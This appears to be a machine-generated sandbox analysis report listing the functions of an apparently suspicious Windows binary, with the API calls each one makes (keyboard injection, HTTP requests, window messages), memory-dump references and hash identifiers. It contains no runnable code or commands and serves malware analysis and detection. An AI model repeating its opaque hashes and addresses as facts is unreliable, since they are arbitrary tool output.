                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Rect$BeepClientMessageScreenWindow
                                                    • String ID:
                                                    • API String ID: 1352109105-0
                                                    • Opcode ID: 32b30aa719c0706177e8dbbf6c7d13da3b7e7aa02d8f9a0dd987db7213fe3542
                                                    • Instruction ID: 1febe0da402453e1ece77294999a091f8b49920c5af1c38ad2b8f6077ba5b528
                                                    • Opcode Fuzzy Hash: 32b30aa719c0706177e8dbbf6c7d13da3b7e7aa02d8f9a0dd987db7213fe3542
                                                    • Instruction Fuzzy Hash: A641BC70680109EFEB11DF58C884AAA7BF5FB49350F2581BAE5288B351C734A816CF5A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00421121, Relevance: 6.1, APIs: 4, Instructions: 108keyboardwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetKeyboardState.USER32(?,774273F0,?,00008000), ref: 00421176
                                                    • SetKeyboardState.USER32(00000080,?,00008000), ref: 00421192
                                                    • PostMessageW.USER32(00000000,00000101,00000000), ref: 004211F1
                                                    • SendInput.USER32(00000001,00000000,0000001C,774273F0,?,00008000), ref: 00421243
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: KeyboardState$InputMessagePostSend
                                                    • String ID:
                                                    • API String ID: 432972143-0
                                                    • Opcode ID: 00e5cad8e269f54cfa59487237ec78c8b5fa0fe40a0b30e18fa290b9f89f0c30
                                                    • Instruction ID: 3867fd88df1dcebb35df12f8ae4025a3aedaa681b5fe48d23987d2daa9789df6
                                                    • Opcode Fuzzy Hash: 00e5cad8e269f54cfa59487237ec78c8b5fa0fe40a0b30e18fa290b9f89f0c30
                                                    • Instruction Fuzzy Hash: AC313D30B40228ADFB208BA5AC05BFB7B79EB6A311F94435FF240911E1C37D4955C769
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00447500, Relevance: 6.1, APIs: 4, Instructions: 105windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004475C0
                                                    • IsMenu.USER32 ref: 004475D8
                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00447620
                                                    • DrawMenuBar.USER32 ref: 00447633
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Menu$Item$DrawInfoInsert
                                                    • String ID:
                                                    • API String ID: 3076010158-0
                                                    • Opcode ID: 6d2b9c4902e9f912496300b021a7f5b5a1f7a85eac9e357352dc678832c20556
                                                    • Instruction ID: 03ad00743ced615faf4173b814a728e19dde88eb691da5a357fd5439959c331e
                                                    • Opcode Fuzzy Hash: 6d2b9c4902e9f912496300b021a7f5b5a1f7a85eac9e357352dc678832c20556
                                                    • Instruction Fuzzy Hash: E7417B75A05608EFEB10DF54D884EAABBF9FB05364F05842AF9559B350CB34AD02CFA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00445175, Relevance: 6.1, APIs: 4, Instructions: 95COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetForegroundWindow.USER32 ref: 00445189
                                                      • Part of subcall function 0042387D: GetWindowThreadProcessId.USER32(00000000,00000000), ref: 00423897
                                                      • Part of subcall function 0042387D: GetCurrentThreadId.KERNEL32 ref: 0042389E
                                                      • Part of subcall function 0042387D: AttachThreadInput.USER32(00000000,?,004252A7), ref: 004238A5
                                                    • GetCaretPos.USER32(?), ref: 0044519A
                                                    • ClientToScreen.USER32(00000000,?), ref: 004451D5
                                                    • GetForegroundWindow.USER32 ref: 004451DB
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                    • String ID:
                                                    • API String ID: 2759813231-0
                                                    • Opcode ID: 88453695aee444d2868cf2e96e1e8d7e5b589fd5e7c46a32084c47c794d90539
                                                    • Instruction ID: 42970ac91a58c8e8fa69d5b4d21e0c114bb4a2756bb5c0c0fd01de9213c1cd16
                                                    • Opcode Fuzzy Hash: 88453695aee444d2868cf2e96e1e8d7e5b589fd5e7c46a32084c47c794d90539
                                                    • Instruction Fuzzy Hash: BC310F75900118AFDB00EFA6C845EEFB7F9EF98304F11406BE415EB241EA75AE45CBA4
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00431B21, Relevance: 6.1, APIs: 4, Instructions: 92networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00431B40
                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00431B66
                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00431B96
                                                    • InternetCloseHandle.WININET(00000000), ref: 00431BDD
                                                      • Part of subcall function 00432777: GetLastError.KERNEL32(?,?,00431B0B,00000000,00000000,00000001), ref: 0043278C
                                                      • Part of subcall function 00432777: SetEvent.KERNEL32(?,?,00431B0B,00000000,00000000,00000001), ref: 004327A1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
                                                    • String ID:
                                                    • API String ID: 3113390036-0
                                                    • Opcode ID: 0ed9a38877a6e7076d5de13a6458764e50baeed20c5c44dd69a88f616f1b39dd
                                                    • Instruction ID: 7bf61e254f4f9d5e3919c5956945244ffcf7db88ed3324da86aaba8afaf45695
                                                    • Opcode Fuzzy Hash: 0ed9a38877a6e7076d5de13a6458764e50baeed20c5c44dd69a88f616f1b39dd
                                                    • Instruction Fuzzy Hash: 042101B2500208BFEB119F61DCC5EFBB7ACEB4A398F10112BF101A2150EA38AD059779
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041B6AF, Relevance: 6.1, APIs: 4, Instructions: 88windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • IsWindowVisible.USER32 ref: 0041B6C7
                                                    • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0041B6E4
                                                    • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0041B71C
                                                    • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0041B742
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend$BuffCharUpperVisibleWindow
                                                    • String ID:
                                                    • API String ID: 2796087071-0
                                                    • Opcode ID: 336f2ec226a97d6bb5dc98e9e6b653f8f0083a528ec3a2aa118dc7f6fa6a4c4f
                                                    • Instruction ID: e8cc4250ec02da3d1f7636ea86a98bac0d5a0d9f7336a84b376802bd7c053dfe
                                                    • Opcode Fuzzy Hash: 336f2ec226a97d6bb5dc98e9e6b653f8f0083a528ec3a2aa118dc7f6fa6a4c4f
                                                    • Instruction Fuzzy Hash: 32212931204254BBEB255B39DC49EBB7BACDF89750F00403AFC05CA2E1EF65DC8192A5
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044C788, Relevance: 6.1, APIs: 4, Instructions: 87windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • GetCursorPos.USER32(?,?,?,?,?,?,?,?,003FBBFB,?,?,?,?,?), ref: 0044C7C2
                                                    • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,003FBBFB,?,?,?,?,?), ref: 0044C7D7
                                                    • GetCursorPos.USER32(?,?,?,?,?,?,?,?,?,003FBBFB,?,?,?,?,?), ref: 0044C824
                                                    • DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,003FBBFB,?,?,?), ref: 0044C85E
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Cursor$LongMenuPopupProcTrackWindow
                                                    • String ID:
                                                    • API String ID: 2864067406-0
                                                    • Opcode ID: 230d0c120e86c4954b44d0e4fe437e133871f964c87dd3b80eb473987e25aa84
                                                    • Instruction ID: 35f31e49e7436cd8cd53b2c9c4e87235dd4b6da6a0b8f0d233a0d08b8464ce46
                                                    • Opcode Fuzzy Hash: 230d0c120e86c4954b44d0e4fe437e133871f964c87dd3b80eb473987e25aa84
                                                    • Instruction Fuzzy Hash: 4431BF36601018BFDB659F58C889EEB7BB9EB0A311F08446AF5048B261C3359950DF68
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00431A5B, Relevance: 6.1, APIs: 4, Instructions: 83networkCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00431A97
                                                      • Part of subcall function 00431B21: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00431B40
                                                      • Part of subcall function 00431B21: InternetCloseHandle.WININET(00000000), ref: 00431BDD
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Internet$CloseConnectHandleOpen
                                                    • String ID:
                                                    • API String ID: 1463438336-0
                                                    • Opcode ID: 7e3c69b804027574487375983261d7e7083dcc9706c201cb31d6e5961afbacae
                                                    • Instruction ID: 59f9a6fbb0f3ad3186b5bec2adc45669dd7ffce4e8a93dbfb5d252574b442c55
                                                    • Opcode Fuzzy Hash: 7e3c69b804027574487375983261d7e7083dcc9706c201cb31d6e5961afbacae
                                                    • Instruction Fuzzy Hash: ED21CD36200600BFEB21AFB18C05FBBBBACFB49715F10112BFA1191560E779E415DBA8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00423C66, Relevance: 6.1, APIs: 4, Instructions: 80COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetFileAttributesW.KERNEL32(?,0044FAC0,?,?), ref: 00423CA0
                                                    • GetLastError.KERNEL32(?,?), ref: 00423CAF
                                                    • CreateDirectoryW.KERNEL32(?,?,?,?), ref: 00423CBE
                                                    • CreateDirectoryW.KERNEL32(?,?,00000000,000000FF,0044FAC0,?,?), ref: 00423D1B
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CreateDirectory$AttributesErrorFileLast
                                                    • String ID:
                                                    • API String ID: 2267087916-0
                                                    • Opcode ID: 4fd485530e543dc489e1912191bc2cb5f3e688027a42896ee0d47542ec29a1c0
                                                    • Instruction ID: 2e648ddaa9b830a5388b0ae2632f19b553303e693c90405701f2157a75f415ce
                                                    • Opcode Fuzzy Hash: 4fd485530e543dc489e1912191bc2cb5f3e688027a42896ee0d47542ec29a1c0
                                                    • Instruction Fuzzy Hash: F321B4756082119F8300DF28D88186BB7F4FE56365F104A2FF495C72A1DB399E4ACF56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E1AF, Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 72stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 0041F5AD: lstrlenW.KERNEL32(?,?,?,?,?,?,0041E1C4,?), ref: 0041F5BC
                                                      • Part of subcall function 0041F5AD: lstrcpyW.KERNEL32 ref: 0041F5E2
                                                      • Part of subcall function 0041F5AD: lstrcmpiW.KERNEL32(00000000,?,?,?,?,?,0041E1C4,?), ref: 0041F613
                                                    • lstrlenW.KERNEL32(?,?,?,?), ref: 0041E1DD
                                                    • lstrcpyW.KERNEL32 ref: 0041E203
                                                    • lstrcmpiW.KERNEL32(00000002,cdecl,?,?,?), ref: 0041E237
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: lstrcmpilstrcpylstrlen
                                                    • String ID: cdecl
                                                    • API String ID: 4031866154-3896280584
                                                    • Opcode ID: 41b5566c172cd660ba12e67828815bd51d0b4c579b3a9ad59178e95f6d73d9ae
                                                    • Instruction ID: 180a70ce2366c335c1cbc1778e6ade656154d921883d351da8fffb5244427a13
                                                    • Opcode Fuzzy Hash: 41b5566c172cd660ba12e67828815bd51d0b4c579b3a9ad59178e95f6d73d9ae
                                                    • Instruction Fuzzy Hash: 1B11D23A200241EECB25AF69DC08DBB77ACEF85310B40412BF906CA150EB359891C7A8
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003F196E, Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 003F19A8
                                                    • SetFilePointerEx.KERNEL32(00000000,00000000,?,?,?), ref: 003F19BC
                                                    • GetLastError.KERNEL32(?,?,?), ref: 003F19C2
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: FilePointer$ErrorLast
                                                    • String ID:
                                                    • API String ID: 142388799-0
                                                    • Opcode ID: bcfb157625c15b49610ecf585fc915a827bb278f3c50b8f57a8075c0a44f3899
                                                    • Instruction ID: 882010eea27995d41e21860f3a825c981ac30ceb6f6fef7fdf74269b5582d818
                                                    • Opcode Fuzzy Hash: bcfb157625c15b49610ecf585fc915a827bb278f3c50b8f57a8075c0a44f3899
                                                    • Instruction Fuzzy Hash: 7E11C47260125DFADB229BA9EC41FFF372CEB42725F100255F620AA0D1CBB5980097A0
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00424D35, Relevance: 6.1, APIs: 4, Instructions: 62synchronizationthreadwindowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetCurrentThreadId.KERNEL32 ref: 00424D5C
                                                    • MessageBoxW.USER32(00000000,?,00000004,?), ref: 00424D8F
                                                    • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00424DA5
                                                    • CloseHandle.KERNEL32(00000000), ref: 00424DAC
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                    • String ID:
                                                    • API String ID: 2880819207-0
                                                    • Opcode ID: 7558746754e2c56830b4279219e24e7dc2b9e81829185de538a2770f766e844b
                                                    • Instruction ID: 542e8dd5ecf52e60671ffc517868dacee3bee9ab05feb7dde87ed9c34ec2c75c
                                                    • Opcode Fuzzy Hash: 7558746754e2c56830b4279219e24e7dc2b9e81829185de538a2770f766e844b
                                                    • Instruction Fuzzy Hash: F311C2B7914158BFD7019BA4EC08EEF3FACEB86364F2043AAF514D2190C2755D048B74
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00419023, Relevance: 6.1, APIs: 4, Instructions: 62windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 00419043
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00419055
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 0041906B
                                                    • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00419086
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: MessageSend
                                                    • String ID:
                                                    • API String ID: 3850602802-0
                                                    • Opcode ID: d508eab4669c7319451c6a680a3ed6bb818d5ecbf3005a8079cfe9bb9fd9c9de
                                                    • Instruction ID: b4d7808dbab3bf04c6ab4d589c9a77b8bbaa506963bab6b716305d6dba4b1882
                                                    • Opcode Fuzzy Hash: d508eab4669c7319451c6a680a3ed6bb818d5ecbf3005a8079cfe9bb9fd9c9de
                                                    • Instruction Fuzzy Hash: ED114C7AA41218FFEB11DFA5CC84EEEBB78FB48350F204096E604B7250C6326E51DB94
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C1290, Relevance: 6.1, APIs: 4, Instructions: 61COMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 003C2612: GetWindowLongW.USER32(?,000000EB), ref: 003C2623
                                                    • DefDlgProcW.USER32(?,00000020,?), ref: 003C12D8
                                                    • GetClientRect.USER32 ref: 003FB84B
                                                    • GetCursorPos.USER32(?), ref: 003FB855
                                                    • ScreenToClient.USER32 ref: 003FB860
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Client$CursorLongProcRectScreenWindow
                                                    • String ID:
                                                    • API String ID: 4127811313-0
                                                    • Opcode ID: 653f46f394241248155bd5e6b188b8401827c8fa89f50a367c3e1e8254981899
                                                    • Instruction ID: bfdea3654d2e2a0118a1f9b3279f815c357d2392d472d8732721b4f171234c7a
                                                    • Opcode Fuzzy Hash: 653f46f394241248155bd5e6b188b8401827c8fa89f50a367c3e1e8254981899
                                                    • Instruction Fuzzy Hash: 14112B39600019BBDB11EF94D885EFE7BB8EB06341F01086AF501E7542C731BE569BA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 003C1D35, Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateWindowExW.USER32 ref: 003C1D73
                                                    • GetStockObject.GDI32(00000011), ref: 003C1D87
                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 003C1D91
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CreateMessageObjectSendStockWindow
                                                    • String ID:
                                                    • API String ID: 3970641297-0
                                                    • Opcode ID: ccd1898f3532958b41479a9f748d9e4991f4396dbac1a8cc2c2b6693461d45c3
                                                    • Instruction ID: a5c42ffbf5e0a5f71b8684a03146301dd899270923d1991d4e7d869b2172dabd
                                                    • Opcode Fuzzy Hash: ccd1898f3532958b41479a9f748d9e4991f4396dbac1a8cc2c2b6693461d45c3
                                                    • Instruction Fuzzy Hash: 10115B72502559BFEB129F94EC48EFABF2DEF0A3A4F054129FA0591011C7329C60EBA1
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041DD22, Relevance: 6.1, APIs: 4, Instructions: 53registryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0041DD3E
                                                    • LoadTypeLibEx.OLEAUT32(?,00000002,0000000C), ref: 0041DD55
                                                    • RegisterTypeLib.OLEAUT32(0000000C,?,00000000), ref: 0041DD6A
                                                    • RegisterTypeLibForUser.OLEAUT32(0000000C,?,00000000), ref: 0041DD88
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: Type$Register$FileLoadModuleNameUser
                                                    • String ID:
                                                    • API String ID: 1352324309-0
                                                    • Opcode ID: 16711671123ee24af919950941389d13fa8b7835589657ebc6e5f5ccc9b17fb8
                                                    • Instruction ID: 392c1847af92c85ba291bd3858795ba804f50e4436eeb80a53b343173b3a1605
                                                    • Opcode Fuzzy Hash: 16711671123ee24af919950941389d13fa8b7835589657ebc6e5f5ccc9b17fb8
                                                    • Instruction Fuzzy Hash: B8118BB5601304EBE720CF10EC09BE37BB8EF42758F10852AE15A86440C775A589DBA9
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00421652, Relevance: 6.1, APIs: 4, Instructions: 52sleepCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004201FD,?,00421250,?,00008000), ref: 0042166F
                                                    • Sleep.KERNEL32(00000000,?,?,?,?,?,?,004201FD,?,00421250,?,00008000), ref: 00421694
                                                    • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,004201FD,?,00421250,?,00008000), ref: 0042169E
                                                    • Sleep.KERNEL32(?,?,?,?,?,?,?,004201FD,?,00421250,?,00008000), ref: 004216D1
                                                    Memory Dump Source
                                                    • Source File: 00000002.00000002.255796281.00000000003C1000.00000020.00020000.sdmp, Offset: 003C0000, based on PE: true
                                                    • Associated: 00000002.00000002.255788727.00000000003C0000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255930635.000000000044F000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255961401.0000000000475000.00000002.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255972297.000000000047F000.00000004.00020000.sdmp Download File
                                                    • Associated: 00000002.00000002.255983987.0000000000488000.00000002.00020000.sdmp Download File
                                                    Similarity
                                                    • API ID: CounterPerformanceQuerySleep
                                                    • String ID:
                                                    • API String ID: 2875609808-0
                                                    • Opcode ID: 80a09abdba16d16265a653f87e822163109f90af9d182c57db4265aaef5c37d7
                                                    • Instruction ID: 82339e7f4120bd971318accf94a9fc9cc42f7488e0f2296ada1716bb537f349c
                                                    • Opcode Fuzzy Hash: 80a09abdba16d16265a653f87e822163109f90af9d182c57db4265aaef5c37d7
                                                    • Instruction Fuzzy Hash: F3117C31E0042DD7CF009FA5E949AEEBB78FF2A351F454066E944B2250CB3455A4CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0044B57F, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetWindowRect.USER32 ref: 0044B59E
